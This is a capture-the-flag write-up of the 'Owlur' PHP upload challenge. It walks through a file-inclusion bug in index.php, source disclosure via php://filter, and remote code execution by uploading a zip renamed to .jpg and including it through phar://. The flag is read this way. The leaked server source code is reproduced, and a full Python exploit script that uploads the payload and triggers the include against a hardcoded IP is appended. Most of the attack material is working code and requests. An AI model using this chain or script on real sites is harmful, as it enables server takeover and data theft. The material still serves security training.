□ description
==========================================
http://54.65.205.135/owlur/
if you use a web scanner, your IP will get banned
no bruteforce required, take it easy
==========================================
http://54.64.81.174/owlur/
The challenge is a site that lets you upload files.
Click here to view a random owl.
Clicking "here" shows a random owl, as below.
http://54.64.81.174/owlur/index.php?page=view&id=random
Setting the page parameter to view shows the picture as in the image above; setting it to index shows the index page as in the image below.
The page parameter selects which PHP file is executed.
That alone tells us index.php has a Local File Inclusion vulnerability.
http://54.64.81.174/owlur/index.php?page=index&id=random
Of the PHP wrappers, php://filter lets us read the source code: the convert.base64-encode filter makes the included file come back as base64 text, which is printed instead of executed.
view.php
http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=view
PD9waHAKJHBpYyA9ICRfUkVRVUVTVFsnaWQnXTsKCmlmKCRwaWMgPT0gIiIgfHwgJHBpYyA9PSAicmFuZG9tIikKewokcGljbmFtZSA9ICJwcmVsb2FkZWQtb3dscy8iIC4gcmFuZCgxLDE0KSAuICIuanBnIjsKfQoKZWxzZSAkcGljbmFtZSA9ICIvb3dsLyIgLiAkcGljIC4gIi5qcGciOwoKCgplY2hvICc8aW1nIHNyYz0iJyAuICRwaWNuYW1lIC4gJyI+JzsKCj8+Cg=
<?php
$pic = $_REQUEST['id'];

if($pic == "" || $pic == "random")
{
    $picname = "preloaded-owls/" . rand(1,14) . ".jpg";
}
else $picname = "/owl/" . $pic . ".jpg";

echo '<img src="' . $picname . '">';
?>
upload.php
http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload
<?php
function RandomString()
{
    $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $randstring = "";
    for ($i = 0; $i < 7; $i++) {
        $randstring .= $characters[rand(0, strlen($characters)-1)];
    }
    return $randstring;
}

$target_dir = "/var/www/owlur/owlur-upload-zzzzzz/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 0;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);   // extension of the client-supplied name only
$fsize = $_FILES['fileToUpload']['size'];
$newid = RandomString();
$newname = $newid . ".jpg";                                    // stored name is always <7 random chars>.jpg

if(isset($_POST["submit"])) {
    if($imageFileType == "jpg") {
        $uploadOk = 1;
    } else {
        echo "<p>Sorry, only JPG images of owls will be accepted. Please use a different service if you do not intend to upload owl pictures.</p>";
        $uploadOk = 0;
    }
    if(!($fsize >= 0 && $fsize <= 200000)) {
        $uploadOk = 0;
        echo "<p>Sorry, the size of your owl picture is not to our liking.</p>";
    }
}

// no check of the file contents anywhere above
if($uploadOk)
{
    $newpath = "/var/www/owlur/owlur-upload-zzzzzz/" . $newname;
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $newpath)) {
        header('Location: /owlur/index.php?page=view&id=' . $newid);
    } else {
        echo "<p>Sorry, there was an error uploading your file.</p>";
    }
}
?>
Uploading a file redirects to a URL like the following:
http://54.64.81.174/owlur/index.php?page=view&id=zfqvcDH
Looking at the upload.php source: only the extension of the client-supplied filename is compared against jpg, and the file is then saved as a random 7-character name plus .jpg. Nothing inspects the file's contents, so any bytes at all end up in /var/www/owlur/owlur-upload-zzzzzz/.
The attack uses the phar:// wrapper.
phar:// (PHP Archive) reads zip and tar archives as well as genuine .phar files, and it locates entries by path inside the archive, so a zip uploaded under a .jpg name is enough.
d.php
<?php print_r(scandir('/'))?>
Zip d.php.
Rename the resulting d.php.zip to d.jpg.
Uploading d.jpg redirects to:
http://54.64.81.174/owlur/index.php?page=view&id=OoebY7U
Open the uploaded .jpg through phar:// and include d.php from inside the archive. index.php appends .php to the page value itself, so the path ends in /d rather than /d.php:
http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/OoebY7U.jpg/d
The listing of / shows a file named OWLUR-FLAG.txt.
Read its contents the same way.
o.php
<?php echo file_get_contents('/OWLUR-FLAG.txt')?>
Zip o.php.
Rename the resulting o.php.zip to o.jpg and upload it.
http://54.64.81.174/owlur/index.php?page=view&id=jnxL8Ja
http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/jnxL8Ja.jpg/o
flag : PHP fILTerZ aR3 c00l buT i pr3f3r f1lt3r 0xc0ffee
index.php itself can be dumped with the same zip-in-a-.jpg trick. Its source shows what the page value is checked against: anything containing "..", "http" or "ftp" (the last two case-insensitive) or 60 characters or longer is rejected; php://filter and phar:// pass all four checks.
<?php echo file_get_contents('/var/www/owlur/index.php')?>
<?php
$p = $_REQUEST['page'];

if($p == "" || $p == "index")
{
    $p = "main";
}

$haq = base64_decode("...");   // long base64 string, elided on this page
$haq = htmlentities($haq);

if(strstr($p,"..") !== FALSE)
    die("<pre>$haq</pre>");
if(stristr($p,"http") !== FALSE)
    die("<pre>$haq</pre>");
if(stristr($p,"ftp") !== FALSE)
    die("<pre>$haq</pre>");
if(strlen($p) >= 60)
    die("<pre>string > 60
$haq</pre>");

$inc = sprintf("%s.php",$p);
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Owlur - The simple image sharing website for owl pictures</title>
    <!-- Bootstrap -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>
<body style="background-color: #d0d0c8;">
<center>
<h1>owlur</h1>
<?php
include($inc);
?>
</center>
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="js/bootstrap.min.js"></script>
</body>
</html>

The base64 string passed to base64_decode (elided above) decodes to the owl below, which index.php prints whenever one of its checks trips:
/---------
/ / /******\
/ /****-- * *\
//(((:<<<</:*********3\X*\((<
/XX/CXC&CGG//**/--///X*V\**..g&
(/VCC3gg0........*//X//(///V*C\*..888gg8g&3C<
(3&gG&...........*..XXX/(((/*.\*.......G/08883X<`
/(<C8 ...........*.XXXX////</..*...............3C^
X//<</...........*&CVX///V/<</.*...............8GC<
XX/C/:</V........*&3CVXVXVX(<V**............... g8C^
GC/<</(.....8G&3CCVXXXXV~XV*............... C83V
V/<^<(X88&V//((<<<<((<^<**...............X&&C
`:/CCV/(((<<(/VVV/*..............(/C&/
<< ^^(/V33VX/VC&X*VC....:<<~<<<((X `
V/(/< ^ ^^:/X/((<<^^---V:~~<<(
3& .^-/
C /\ /\ |
/C \/ \/ //
PLZ STOP 3 |\
HACKING C /5*
V /-----\ /
CG | | <///<
VGV | | ^(/X<^
&&< \-----/ .((<(^
83( .<(~`<<
8X` .<<^` `((^
B@@C<.`^^` ^(CG&C(<.``
CG8B$@@@@@@@@@$( ^^(0@@@@$83X<`
B@@@@@@@@@@@@@@@@@8/ `<C$@@@@@@@@@@$&<
@@@@@@@@@@@@@@@$$$@@@$$0888B@@@@@@@@@@@@@@@@@V`
@@@@@@@@@@@@@@$@$$$$$$$@@@@$$@@@$@@@@@@@@@@@@@@C`
@@@@@@@@@@@@@@$@$$$$$$$$$$$$$$$$$$@@@@@@@@@@@@@@@(`
@@@@@@@@@@@$@$$$$$$$$$$$$$$@@$$@@@@@@@@@@@@@@@@@@B
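The whole chain, as an added example in Python (my own code, not the write-up's or the challenge's): it builds the php://filter page value used above to dump view.php and upload.php, decodes what index.php echoes back, packs a script into a zip that upload.php accepts as a .jpg, builds the phar:// page value, and re-implements the four checks from index.php (no "..", no "http"/"ftp" case-insensitively, length under 60) so a payload can be verified offline before it is sent. The field name fileToUpload, the submit field and the upload directory come from the sources above; posting the form to index.php?page=upload, the response layout the regex expects, and the base URL in the main block are assumptions.

```python
"""Owlur LFI chain: php://filter source disclosure, then phar:// include of a
zip uploaded as .jpg.  Added example, not part of the original write-up."""
import base64
import io
import re
import urllib.parse
import zipfile

UPLOAD_DIR = "/var/www/owlur/owlur-upload-zzzzzz/"   # from upload.php
MAX_PAGE_LEN = 60                                     # index.php: die() if strlen($p) >= 60


def filter_page(script):
    """page= value that makes index.php include its own source as base64.
    index.php appends ".php", so the script name is given without extension."""
    return "php://filter/convert.base64-encode/resource=" + script


def decode_filter_output(body):
    """Pull the base64 blob index.php prints after <h1>owlur</h1> (assumed
    response layout) and decode it.  Missing '=' padding, as in the copy of
    view.php on this page, is restored before decoding."""
    m = re.search(r"<h1>owlur</h1>\s*([A-Za-z0-9+/=]+)", body)
    if not m:
        raise ValueError("no base64 payload found in response")
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode()


def build_phar_payload(inner_name, php_source):
    """Zip archive holding <inner_name>.php.  phar:// reads zip-format
    archives, so no real phar stub is needed; upload it with a .jpg name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(inner_name + ".php", php_source)
    return buf.getvalue()


def phar_page(upload_id, inner_name):
    """page= value that includes <inner_name>.php from the uploaded archive."""
    return "phar://" + UPLOAD_DIR + upload_id + ".jpg/" + inner_name


def index_php_guard(page):
    """Re-implementation of index.php's checks on $_REQUEST['page'].
    Returns the path handed to include(), or None where the script die()s."""
    p = "main" if page in ("", "index") else page
    if ".." in p:                      # strstr($p, "..")
        return None
    low = p.lower()                    # stristr() is case-insensitive
    if "http" in low or "ftp" in low:
        return None
    if len(p) >= MAX_PAGE_LEN:
        return None
    return p + ".php"                  # sprintf("%s.php", $p)


def multipart_upload_body(filename, data, boundary="owlurboundary"):
    """multipart/form-data body for upload.php: file field fileToUpload with
    a .jpg name (only the extension is checked) plus the submit field."""
    head = (f'--{boundary}\r\nContent-Disposition: form-data; name="fileToUpload"; '
            f'filename="{filename}"\r\nContent-Type: image/jpeg\r\n\r\n')
    submit = f'--{boundary}\r\nContent-Disposition: form-data; name="submit"\r\n\r\nUpload\r\n'
    tail = f'--{boundary}--\r\n'
    body = head.encode() + data + b"\r\n" + submit.encode() + tail.encode()
    return body, "multipart/form-data; boundary=" + boundary


if __name__ == "__main__":   # hypothetical live run; base URL and form action are assumptions
    import sys
    import urllib.request
    base = sys.argv[1] if len(sys.argv) > 1 else "http://54.64.81.174/owlur/"
    payload = build_phar_payload("d", "<?php print_r(scandir('/'))?>")
    body, ctype = multipart_upload_body("d.jpg", payload)
    req = urllib.request.Request(base + "index.php?page=upload", data=body,
                                 headers={"Content-Type": ctype})
    with urllib.request.urlopen(req) as resp:       # redirect lands on page=view&id=<newid>
        upload_id = re.search(r"id=(\w+)", resp.geturl()).group(1)
    page = phar_page(upload_id, "d")
    if index_php_guard(page) is None:
        sys.exit("page value would be rejected by index.php: " + page)
    with urllib.request.urlopen(base + "index.php?page=" + urllib.parse.quote(page, safe="/:")) as resp:
        print(resp.read().decode())
```

The length check is the tight one: "phar://" plus the 35-character upload directory, the 7-character id and ".jpg/" already come to 54 characters, so the script name inside the zip can be at most 5 characters before strlen reaches 60. That is why single-letter names such as d and o are used above.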